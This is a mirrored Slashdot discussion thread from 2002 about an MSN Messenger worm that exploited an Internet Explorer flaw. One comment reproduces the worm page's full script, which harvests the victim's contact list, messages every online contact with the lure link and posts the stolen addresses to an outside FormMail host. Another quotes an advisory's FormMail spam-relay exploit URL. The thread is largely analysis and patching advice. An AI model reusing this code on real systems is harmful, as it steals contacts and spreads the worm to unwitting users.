Slashdot Mirror
Microsoft Instant Messenger Virus Sweeps Net
Sequence: Get messaged "Go To http://www.masenko-media.net/cool.html NoW !!!" or something similar with another URL. Follow the link. That webpage contains malicious code which gets your messenger contacts and sends a similar message to your contacts. It looks like it uses a vulnerability in formmail.pl as well, although I'm not exactly sure how (I'm not an expert in ECMAscript, sorry, and I have no systems that could possibly be affected by this to test with). I'm sure some of our readers can provide more information in the comments below.
There appear to be several webpages which carried the infected code, not just masenko-media.net. Some webmasters are already taking them down.
Sophistication: moderate. Damage: only your pride.
Solution: probably the latest mega-patch for Internet Explorer will fix the Microsoft bug that allowed this.
Risks: obviously, the code could have done worse than just messaging your contacts. With Microsoft making "messaging" an integrated part of the operating system, any flaws in it can be exploited to affect millions of people instantly, so it is a high-value target. Does it have commensurate high-strength security?
because I was using the linux version of Microsoft Messenger!
If the entire population of slashdot accessing that site to point and laugh at the exploit code and how it doesnt affect them doesnt constitute a slashdotting, I dunno what does =) I already cant access it.
;)
Someone post more links to the other vector pages, if we can't get them down any other way we'll bum-rush em
With a name like Warhol, obviously this isn't a virus, it's a form of art.
I was waiting for one of those super annoying forwarded URL's to cause trouble, and its finally happened.
Why can't one single week go by without a big annoying MSFT bug / virus being exposed?
Do people save these bugs up and release havoc at regural intervals?
Are there people in the inside, planting seeds?
At least it makes for good news.
"Peace, Love and Apathy"
iF yOuR fRiEnDs SeNd YoU mEsSaGeS fOrMaTtEd LiKe ThIs, YoU nEeD tO fInD nEw FrIeNdS!!!11
I assume this only affects the MSN client from Microsoft... correct? Or does this also affect other clients that can use the MSN network, like Trillian? If it is just a link to some virus code on a website, it would affect Trillian (because it actually doesn't propagate through the instant messaging program)... but if it is something that gets triggered inside MSN Instant Messenger, then Trillian users are safe...
Mark
I for one, am not shocked at all :)
Anyone who is shocked is a bit of a fool. It was only a matter of time, really, until one of M$'s many security holes in messenger was exploited. Kinda sad to think what will happen in the future as OS becomes more and more integrated with the internet. Your personal data (courtesy of passport) might be spread around if you replied to a IM, or data loss.
Don't use microsoft products, so I am not vulnerable. Happy me.
What's the url for this virus? The link to "Go To http://www.masenko-media.net/cool.html NoW" wasn't clickable. Please fix this, /. admin!
"I have not failed. I've simply found 10,000 ways that won't work." --Thomas Edison
Use Trillian :http://www.trillian.cc. A few people msg me with the link. All that happens in that a blank window pops up. Mind you, i am on dual monitors so that may have had something to do with it. The code for the page (http://www.masenko-media.net/cool.html ) is:
8 3" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C54 1" id="msnObj2"></object>';
<br><br>
<html>
<head>
<title>Welcome</title>
<Script>
var msnWin;
var msnList;
var msgStr = "Go To http://www.masenko-media.net/cool.html NoW !!!";
function Go(){
msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F7956
focus();
if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}
function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";
for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
}
document.contents.contentBox.value = msnStr;
}
function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}
</Script>
</head>
<body onload="Go()">
<p align="center">
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="http://www.yong.f2s.com/mailform.pl" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1">
<input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
</body>
</html>
I wrote a simple script about a year ago that exported a user's MSN registry key and sent it to me. Given that MSN logins, Passport Logins and Hotmail logins all could be gleaned from that key... well you get the idea.
It worked too. Got to log into MSN as the CTO of our company, just to make a point.
As long as scripters can manage things like this, and as long as it is _that_ easy to pull a person's login data from the registry, Passport will _never_ be secure.
best web host ever
First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions. As the post noted, it is fixed with the latest IE patch. The actual problem was with IE's document.open scripting object, and how it was able to access local system objects from web sites (basically, the about: URI namespace was considered to be in the "My Computer" security domain, which means it had much more lax security than an actual website. However, since about: can take valid html, site developers were able to embed Messenger objects in about: pages, and access information from that). This is not a problem with Messenger at all.
Install the patch and be done with it.
the register had an article about this a few days ago. A flawed Document.Open() in the script apparently causes it. The demo site the reg links to is pretty interesting. And of course, MS has known about this since december :-P
I get this message from this girl I kindof like on MSN saying to go to this URL urgently. So I do (duh!). Turns out it is a porn site.. So I'm thinking what is this girl saying? Is she dropping some no so subtle hints? As I ponder this I get a MSN message from my mom asking me why I sent her a link to a porn site.. then I understood..
The worm seems to be named because of a quote that the site attributes to Andy Warhol.(ie. 'in the future everyone will have his 15 minutes of fame.') That quote should actually be attributed to Marshal MacLuhan, who Andy ripped it off from. So these worms should be name MacLuhan worms.
Damnit, Jim, I'm an anarchist, not a F@#$!^& doctor!
i think the biggest implication of this is what the poster originally posted. If m$ is going to make messaging a corner stone of thier .NET project the potential for a more advanced virus than this one could really mess sh*t up. :o
The page appears to post a hidden form with your email information to the page. I suspect that it may be a contact gatherer for spammers (a new low...) though it could have done much more.
FormMail.pl is the perl script which recieves this information. It is pretty interesting...
LedgerSMB: Open source Accounting/ERP
The virus probably just gets the COM object that their messenger implements through javascript. The security hole is that IE lets a web page talk to the messenger client. I would guess that it does that so you can add contacts by clicking on web links and stuff like that.
47% of all statistics are made up on the spot.
I've been reluctant to use the MS IM client because it didn't appear they had fully integrated it's virus abilities with all their other software. Now that it's part of a fully integrated Microsoft Virus Productivity Suite, I'm ready!
Can anybody tell me where I can sign up for one of those Passport Universal Identifier and Cybercash Wallets and get the MS implant in my right hand or forehead?
They no damn well it's going to generate nothing but flamebait from the folks posting responses...
I guess I just don't get it...
"Look where we worship" -- Jim Morrison
- Microsoft Instant Messenger Virus Sweeps Net
- What is
.NET?
- States Demand Windows Source Code
- Details of MSFT's Antitrust Lobbying
There were none yesterday, or the day before... the calm before the storm...Just go to the registrar www.godaddy.com:
MASENKO-MEDIA.NET WHOIS results:
The data contained in Go Daddy Software, Inc.'s WHOIS database,while believed by the company to be reliable, is provided "as is"with no guarantee or warranties regarding its accuracy. Thisinformation is provided for the sole purpose of assisting youin obtaining information about domain name registration records.Any use of this data for any other purpose, including, but notlimited to, allowing or making possible dissemination orcollection of this data in part or in its entirety for anypurpose, such as the transmission of unsolicited advertising andsolicitations, is expressly forbidden without the prior writtenpermission of Go Daddy Software, Inc. By submitting an inquiry,you agree to these terms of usage and limitations of warranty.Registrant: Net Crater NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States Registrar: Go Daddy Software (http://registrar.godaddy.com) Domain Name: MASENKO-MEDIA.NET Created on: 06-Feb-02 Expires on: 06-Feb-03 Last Updated on: 06-Feb-02 Administrative Contact: Crater, Net domains@netcrater.com NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States 3365917696 Technical Contact: Crater, Net domains@netcrater.com NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States 3365917696 Domain servers in listed order: NS1.NETCRATER.COM NS2.NETCRATER.COM
You fucking moron! The domain record applies to the domain only.
whois masenko-media.net
until someone unleashes a virus that does some serious damage. If I was a "terrorist" hell bent on punishing the Western world for whatever percieved sins, I'd be learning how to make, or hiring programmers, to unleash a truely destructive virus.
It's been said many times before, but I'll say it again, any monoculture is far more vulnerable to attack than a diverse system. Relying on one system, be it Microsoft or even Linux, is foolish.
The destruction of the Microsoft monopoly is not just a matter of helping improve competition, it is a serious security matter. No amount of campaign donations or legal semantics should distract the government from its task of providing security.
* * Always question "the National Interest" - 9 times out of 10 it is a cover for evil
Uh, so people can download the patch before they get the virus, maybe?
just gave it a go, and it didn't affect me. running winxp with netcaptor browser (embeds ie) and trillian (im client that connects to the msn messanger network among others)
not that i was expecting it to work.
what amuses me though, is how the linked page from this article reads like a very handy worm writing primer, suggesting better propogation methods -
Optimized scanning routines, hitlist scanning, and permutation scanning can be combined to produce hyper virulent Warhol Worms. Since they are so fast, such worms would be the vehicle of choice for delivering malicious payloads to the net at large.
But /. is right, it is a Warhol virus : all the posters who reported this non-news got their 15 minutes of fame on Slashdot.
GET
Host: www.masenko-media.net
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Win32)
HTTP/1.1 404 Not Found
Date: Thu, 14 Feb 2002 00:07:30 GMT
Server: Apache/1.3.20 (Unix) mod_bwlimited/0.8 PHP/4.0.6 DAV/1.0.2 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
<HR>
<ADDRESS>Apache/1.3.20 Server at www.masenko-media.net Port 80</ADDRESS>
</BODY></HTML>
(No Micros**t anywhere on these machines. Cheers!)
Unlimited growth == Cancer.
hmm, I went to that link and got a 404 error.. nothing to worry about if you use mozilla, but how can this do something bad to IE? Did they take the page down?
You might try just the domain name. Which comes out to:
Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02
Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM
Looks fine to me..:)
BWP
mbrennek@spaceheater:~$ host www.masenko-media.net
.com, .net, and .org domains can now be registered
.COM, .NET, .ORG, .EDU domains and
;l34j65] lksdjflkaj -908ausdfg0 oi;3lkj4;6lkn3 56;o38tusap[df8u opsiajd ;alskdjtl3k4jl5kj345;1l 4jlwkjf l;kj a
www.masenko-media.net. is an alias for masenko-media.net.
masenko-media.net. has address 66.96.247.55
mbrennek@spaceheater:~$ whois masenko-media.net
Whois Server Version 1.3
Domain names in the
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: MASENKO-MEDIA.NET
Registrar: GO DADDY SOFTWARE, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.NETCRATER.COM
Name Server: NS2.NETCRATER.COM
Updated Date: 06-feb-2002
>>> Last update of whois database: Wed, 13 Feb 2002 17:06:43 EST
The Registry database contains ONLY
Registrars.
Found InterNIC referral to whois.godaddy.com.
The data contained in Go Daddy Software, Inc.'s WHOIS database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose, including, but not
limited to, allowing or making possible dissemination or
collection of this data in part or in its entirety for any
purpose, such as the transmission of unsolicited advertising and
solicitations, is expressly forbidden without the prior written
permission of Go Daddy Software, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty.
Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02
Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM
other crap added below to avoid "postercomment" compression filter, because obviously compression isn't a way to catch the real trolls, since it caught me, but hasn't caught the ascii art allready attached to the story. 45908-6230569laksdflkjn
Hope that's enough to get it through the filter this time.
Your WHOIS must suck:
Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02
Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM
The thing that gets me is that NOTHING MAKES ANY DIFFERENCE. Web defacements - make no difference. ILoveYou - no effect. Melissa: nada, Nimda - plus ca change, plus ca la meme chose. Code Red? code schmed. The PHBs seem quite happy to just reformat, reinstall, count it as a cost of doing business on the net, and forget any lessons less stupid people might learn.
Don't believe me? check out the IIS curve at Netcraft . What happened after Nimda and Code Red? IIS usage INCREASED.
Mebbe I'm just bitter cos I'vre been trying to break into info-sec work for the last few years and getting nowhere cos I haven't an MCSE|CCNA|CISSP|security clearance, although I can usually spot half a dozen glaring holes in a setup within a few hours. (actually I interviewed at a "leading security firm" once & was given an automated test: I couldn't help noticing the machine I was given was logged in as NT Domain Admin. No, it wasn't a double-bluff test of my ethics!)
Er... well, yes, I AM bitter; but that doesn't change the fact that there are an awful lot of clueless gimps out there managing (techs who manage) networks and network-connected systems.
It seems to me that nothing short of a totally 100% evil malware that nukes HDs after silently & terminally corrupting backups for a few weeks will hit enough people where it counts - their wallets - to make any difference to the importance placed on info-sec in the vast majority of places.
Yes, but guess what M$ have decided to make a compulsory add-on to windows XP. Yep, that's right, Messenger. I can just wait for the argument as to why "messenger is an essential part of windows".
Just an FYI about the lack of security on older versions of formmail.pl You should replace the exploitable version, if you are using it yourself.
% 20send%20anonymous%20spam.
Formmail.pl Can Be Used As An Open Mail Relay
Summary
The CGI program Formmail.pl lacks adequate security checks and allows spammers to send anonymous e-mail using vulnerable host as mail relays.
This vulnerability has already been exploit by spammers in many installations of Formmail.pl.
Details
Matt Wright's formmail.pl program does a "security check" on the HTTP_REFERER server variable. The security check is usually used to verify that information submitted from a form came from a proper or designated domain. This is usually done to prevent someone from creating a local, malicious form to submit to a script. This can be easily bypassed by passing a raw HTTP request, and faking the HTTP Referrer. This script also allows you to set the recipient's email address in the form. These two factors allow a malicious user to use the formmail.pl program two distribute their email (SPAM).
Exploit:
A URL such as the following:
http://www.example.com/cgi-bin/FormMail.pl? recipient=email@address-to-spam.com&message= Proof%20that%20FormMail.pl%20can%20be%20used%20to
Will send an anonymous e-mail if the installed FormMail.pl is vulnerable.
Workaround:
1. Remove your formmail.pl script until the author provides a fix.
or:
2. Hard code the recipient's email address in the formmail.pl program. Do not rely on the address submitted by the user.
--It's Pimptastic!--
Somebody mod this parent as "funny", or "underated" because the authore has a point, the slashdot effect should sufic to kill any of the infection sites, and with a high degree of impact.
It isn't a lie if you belive it.
"Go To http://www.goatse.cx NoW !!!"
Imagine if your friends suddenly knew not only that you were gullible enough to fall for a virus like that, but that you had seen that site...
I know that formmail.pl has some vulnerabilities, and figured people were just probing me.
This would explain where it is coming from. Add this to the code red etc that my poor little web server on DSL has to deal with
To me this sounds like Code Red, only speeded up so it could do a lot more scans in a much shorter period of time and infect many more computers. The author must be a bit more experienced than the author of Code Red because they have built in multithreading which wasn't in Code Red. This makes it possible to probe and attack multiple machines at once and even begins by attacking a list of 50,000 machines known to have good internet connections.
--Metrollica
According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thing slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone? )
"None are more hopelessly enslaved than those who falsely believe they are free." -- Goethe
Have any A/V companies deployed products to protect against instant messaging vulnerabilities? I know that Bitdefender have a product that helps to increase your security when running such services, but I haven't heard of similar things from Norton/McAffee.
;)
I always thought this was kinda silly, waiting for the horse to leave before closing the stable. Did anybody not view Instant Messenger traffic, especially once it got into a high level of file transfer interaction, as not being a platform for the deployment of viruses?
Still, this is a social engineering thing more than it is anything else. It's not even really a virus -- it's a piece of destructive code delivered via social engineering. It is not really self-propogating, though, in that it requires the server-side in order to be malicious, or do anything at all.
That seems to me to be stretching "virus" a bit. Maybe "viral meme"? I agree it does spread a bit like a virus, but it actually requires fetching external information.
-l
P.S. Bitdefender are beta'ing a Linux product, by the way. It's not Open, but the beta is a free (as in beer) download. Disclaimer: I'm a fan of that company.
it can be removed from xp. Read ntcompatible.com, then go change your registry and remove messanger! Oh, wait, I mean laff at your friends who use windows, right.........
i hope you don't talk that way to your (unfortunate) kids when they make a mistake.
Dammit, I meant to post that anonymously!
Look closely:
...
<input type="hidden" name="recipient" value=mmargae@wanadoo.nl" ID="Hidden5">
I think somebody forgot that HTML source can be viewed
The nasty part: every time somebody looks at this page, his MSN-email address is being posted to this mailform.pl script (the web equivalent of an open relay) and it is sent to this wanadoo.nl user.
--
If code was hard to write, it should be hard to read
I just copied and pasted part of this story into an outlook email and sent it to our staff warning them of the problem. The address to the masenko-media site came out as a URL. I wonder how many users will click it?
The race isn't always to the swift... but that's the way to bet!
>>Is the solution simply to not use Microsoft Messenger?
No, but that's a good start.
People keep going on (posting here that is) as if this is some sort of sensationalization of Microsoft security issues. As if other media outlets jump on Microsoft like vultures. Well, wake up, they don't (imho). The 'straight' media tends to avoid bad business news, especially given the danger of being sued by the most politically powerful, media powerful, and just plain rich powerful, software company around. Hmmm, AOL/Time don't count right?
Just because it's the latest #@#k up from Microsoft doesn't deminish it's importance as news.
How many times have I shocked an Internet user (years of tech support, I'm so bitter!) by exploiting IExploder sillyness and effectively crack the lusers OS? They were none to pleased, I have to say. It's not like I can even code really, I'm a moron with programming. But if I can do it...
And it's better to find out about these things in the news, not the hard way!
"A fully coordinated worm, where the worms explicitly coordinate their attack on the network, is a theoretical possibility but has not been seen in practice due to the difficulty in coding and coordinating the worms."
/. some time ago about the impossibility of removing viruses from a computer network without shutting the network down under certain conditions.
Obviously the author has not heard of the interpreted, functional programming language Erlang. It can be best described as "The Borg" and has language level support for things like automatic resource discovery, live updates of software modules and distributed databases. There are binaries available for many architectures.
An attack platform written in this language has the potential to be utterly devastating. Imagine, all of the infected nodes know about all of the other nodes. You have a distributed database containing information on exploits and probes for various computer systems that can be updated on the fly as new exploits are discovered. Even the code for the platform itself can be updated while the system is running.
As I recall, there was a story on
Why hasn't this happened yet? It surely isn't for lack of expertise. No need to worry though, all the legislation that's been passed regarding computer crime prevents this sort of thing, right?!
I guess they will need the whole month to 'focus on security'. Good thing they budgeted so much time.
Kind thoughts do not change the world
(Prof. Nutbutter / Tales from the Punchbowl)
--
The Cap is nigh. Time to get a fresh new account.
Isn't it possible that the virus itself flooded the website with many hits to it coming from just instant messenger? :)
:)
Plus, since the topic author knew the exact URL from somewhere, it must have already been fairly widespread before it got here
Cover your eyes and click this link!
What is .NET?
Well, here's the answer. =)
Dude, that site is soooo Slashdotted.
You know what?
i copied this script and put it up on my website www.sa misgod.com/cool.html but its not working...is it a server side script?
Warhol style worms are purely active worms, which require no human intervention to spread. This worm sounds like an intervention-required worm/trojan (like a mailworm) but which spreads through MSN instead of email.
It would be a warhol-like worm if the message sent automatically opened the web page, making it a purely autonomous worm. I sorta wish it was, because that would be an interesting validation of the speed of topologically aware active worms. Then again, I don't use MSN Messenger.
For those who are interested, a more formal analysis is available Here, a paper I submitted to Usenix Security on the subject.
Test your net with Netalyzr
...are aware of the seriousness of their acts.
Don't they know that virus making will soon be considered a hate crime?
On another note, I wonder how many victims of the Warhol virus also caught this recent virus.
When faced with a problem, many web developers say "I know, I'll use JavaScript!".
Now they have two problems.
The "Don't Fucking Open Me!" virus is still spreading havoc.
E-mail inboxes were flooded with messages this morning as a new virus quickly spread around the world. Dubbed "Don't Fucking Open Me" by anti-virus researchers, the infected e-mail follows a similar course to other viruses and replicates by sending itself out to everyone in the infected computer's Outlook and Outlook Express address book. The virus also contains two different payloads: one version formats the hard drive and displays the message "This is for your own good"; the other payload creates random Power Point presentations in the "My Documents" folder.
Savvy users can spot the virus by its subject which is "Don't Fucking Open Me" or by the attachment which is entitled "Don't_Fucking_Open_Me.exe".
"This virus tricks the user with an old psychological tactic called reverse psychology. Apparently the curiosity created by the message has been too much for thousands of users," said anti-virus researcher Bob Atibop. According to Atibop, this isn't the first time reverse psychology has been used. In 1998, the "Don't Pee on Your Keyboard" worm caused a flood of damage.
Researchers have seen large infection among AOL users and middle managers, the two largest concentrations of naive and inept computer users.
Claudia Hawkins who was infected by the virus said, "My son told me not to open attachments, but.... I mean my MOM sent it! What if she was hurt?!?"
Another infected user too embarrassed to reveal his name said, "I thought that there was no way that this could be a virus. What kind of stupid idiot virus writer would put a dumb title on it like that? No one would ever open something that says not to open it. The virus would never spread defeating the whole purpose of it."
Experts advise extreme caution when opening messages entitled "Don't Fucking Open Me" or "Click Here for Cash and Virus Infection".
--Metrollica
Well, there has been a couple of well known "features" for some time. All you needed was to insert some code on your site and you could see who visited you on the site and who their "Friends" were. on all sites this was only their Messenger name, including the ones on your contact list.
Then there is some hardcoded urls into Messenger that allow certain sites obtain your email adr. and the emails adr. of the people in your contact list. thise sites include microsoft.com, hotmail.com.
Hmm thinking about whipping up an example on my website,, heh could be fun.
MS wrote IE.
MS wrote Messenger.
MS wants to bundle the two together into their OS.
A browser is not a server.
Linux is a kernel, not a distro.
Your comment has too few characters per line (currently 9.1).
When in doubt, have a man come through a door with a gun in his hand.
Before, i was convinced that Microsoft's obsession with closed source was an evil plan to allow them to hide malicious code in Windows so they could take over computers/internet/world. Now i have come to realise, that the real reason is because they are so incompetent that they don't want anyone to see the crap, uncommented, un-nested, spaghetti code that they call software, for risk of other corporations laughing at them, like a lecturer laughs at the bottom-of-the-class student who submits their half-assed assignment code that looks like a 3-year old wrote it (i'm sure many 3 year olds could actually write decent code :) If anyone witnessed what was really in the operating system their business was relying on, they would rather have BBC BASIC (oh, wait, VB _is_ BASIC rofl :)
Now i have realised that Microsoft couldn't plant code in Windows to take over the world, because they can't code, and are too busy writing software that will try to stop your computer working if you change more than 5 bits of hardware.
This comment does not represent the views or opinions of the user.
I just visited my friend's brother to pick up a used telescope. His brother's system is down because he clicked on a link in an email that said something like "pictures of me naked."
When I told him that anything like that was obviously a worm or some kind of scam, he responded: "But it was from a girl who DOES send me pictures of herself naked!"
Didn't know what to say to that.
"Hardly used" will not fetch you a better price for your brain.
Why the hell does it take Microsoft so long to get patches onto Windows Update, which most users use to get their updates (those that look)?
Like, when I heard about the SNMP problem yesterday, I went to rhn.redhat.com, found an update for snmp, did a select all for all my linux boxes i adminster at work, scheduled them to be updated, done. I got look for an SNMP update for my Windows servers, none found.
It's just annoying... Microsoft has billions for R&D, takes weeks to get a patch out on Windows update, yet some kid can write autorpm that does the same kinda thing for linux in his spare time...
I hate Microsoft, but my favourite part isn't this story. My favourite part is the link directly under it.
.NET? | Linus Merges ALSA Into 2.5.4 >
< What is
You gotcher answer, folks.
--------
Bleah! Heh heh heh... BLEAH BLEAH!!! Ha ha ha ha...
A quick Google search for "risks digest eye surgery" yields this link. Pretty frightening stuff, and it does show how well many users have become trained to treat error conditions as part of the normal behavior of computer operating systems and applications.
YES! That's excellent advice. I removed MS Messenger and installed Trillian, and I can't remember the last time I was so completely thrilled with a piece of software. Use Trillian. It does AIM, ICQ, MSN, Yahoo, and IRC, it's free, it looks awesome, it's updated often, it's easy to use, it works well, and did I mention it looks awesome? If there's any reason to use any other IM client, I don't know what it is...
I already renamed my HTML tags that i think are dangerous to and currently used by booters to cause an AV on ypager.exe with a hex editor.
I might do the same with MSN now.
I was told there is a Yahoo messenger virus doin the rounds too, but i havnt seen it (yet).
----- Whats wrong with this picture? http://www.revoh.org:1234/whatswrong
Yes, but if it was an organized effort directed at the site for the express purpose of bringing it down, the guys at OSDN could be held liable for a DDoS.
they're ActiveX viruses, and will do more than send MSN Messenges to your friends if you're using IE
Woo.. You used organized, and OSDN in the same sentance! That's pretty funny stuff!
[angelfire]
Temporarily Unavailable
The Angelfire site you are trying to reach has been temporarily suspended due to excessive bandwidth consumption.
The site will be available again in approximately 2 hours!
Are you the owner of this site?
To check your daily bandwidth usage, click here.
To obtain a higher bandwidth limit, click here.
Don't believe me? check out the IIS curve at Netcraft [netcraft.com] . What happened after Nimda and Code Red? IIS usage INCREASED.
Firstly, statistics, even the 'raw' ones provided by Netcraft, can be read with any spin you choose to apply (as you have done)
Secondly, you're not looking at sites that are active, just ones that have a webserver running. This includes about 2/3 of machines that aren't actually active servers. Check the figures yourself. 36.7 million polled, 13-ish million active. The more relevant graph is the second one provided, showing the count and growth of active servers, not just plain numbers of them.
Bzzt, wrong.
MSN Messenger is a downloadable on every Windows prior to XP, AFAIK (I'm not sure about 2k or ME, but I know that it isn't integrated into anything, even if it comes with the OS)
Y2K Compliant since the late 1890s
It really annoys me, I log into hotmail to check my mail and it launches MSN! I only keep it around in case Trillian decides to crap out on me.
Is there a way to keep IE from launching it without totally breaking MSN Messenger?
Most of the flamebait gets moderated down anyway so users can choose to ignore it.
/. only be open to Linux users? I'm using Microsoft at work mostly because all the development software we need is released for it. Therefore most of my time is using Microsoft software.
/. because it's informative, up to date and generally /not/ biased towards any OS. There's flames, but you end up with flames no matter where you go...
And anyway... Why should
I'm still reading
I have enough of capitals. they seem like you're screaming everything. Plus, I hate my COBOL! course. This language is so old it looks like it's been designed to make grandma's weaver work. Anyways. About that "virus" I hope it doesn't do anything more than messaging poeple. t'would suck to install once more that (X)tra (P)epperoni. I think I wouldn't re-install it. If it's f@ked up because of some lame microsoft security bug well it'll go down and crash good time HAHAHAHAHAHAHA! (oops caps again).
So according to the issue of RISKS Digest, this third-party program called "Ladarvision" kept on throwing very odd error messages internal to the program, and the tech was trained to hit RETURN. How is this Microsoft's fault?
Windows 95 is pretty stable if you use it as a single-tasking OS. I mean, there are still point-of-sale systems running DOS, and that provides just slightly less memory protection than Windows 95 does. Just don't blame the OS vendor for a shoddily-written third-party program.
For more information, click here.
....your forehead or your foreskin.....
I want to be alone with the sandwich
WHOIS information for masenko-media.net:
The Data in Network Solutions' WHOIS database is provided by Network
Solutions for information purposes, and to assist persons in obtaining
information about or related to a domain name registration record.
Network Solutions does not guarantee its accuracy. By submitting a
WHOIS query, you agree that you will use this Data only for lawful
purposes and that, under no circumstances will you use this Data to:
(1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail
(spam); or (2) enable high volume, automated, electronic processes
that apply to Network Solutions (or its systems). Network Solutions
reserves the right to modify these terms at any time. By submitting
this query, you agree to abide by this policy.
The data contained in Go Daddy Software, Inc.'s WHOIS database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose, including, but not
limited to, allowing or making possible dissemination or
collection of this data in part or in its entirety for any
purpose, such as the transmission of unsolicited advertising and
solicitations, is expressly forbidden without the prior written
permission of Go Daddy Software, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty.
Registrant:
Net Crater
Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM
The previous information has been obtained either directly from the
registrant or a registrar of the domain name other than Network Solutions.
Network Solutions, therefore, does not guarantee its accuracy or
completeness.
Why would you have to edit the registry just to remove a friken messageing program. Talk about a pain in the arse. Definately makes me glad I use OS X as my primary OS, Linux as my secondary and Windows as my gaming platform (at least till I get my PS 2)
T Money
World Domination with a plastic spoon since 1984
That's right. I'm sad to see that you had such a low esteem of me you thought I might be running XP. :)
Unhappy ? thanks to the beauty of Matts formail you can mail them by simply clicking this link :)
:)
Click here to mail them
It's 9:35 pm EST, and Windows Update seems to have fallen off the DNS. Interesting timing, that. Is it just my ISP? Microsoft forget to pay its bills, again? Or is something more sinister at work?
Maybe it's just me, but my inner conspiracy theorist is telling me that someone evil enough to start an IM worm using a patchable exploit could also be evil enough to cut off the first place people would go to look for that patch.
This sig intentionally left blank.
Why not add a Javascript ticker-tape display to Slashdot so we can just watch the M$ virii/security-holes flash by like so many stock market reports?
Was this before or after they investigated the code for security problems per the new order?
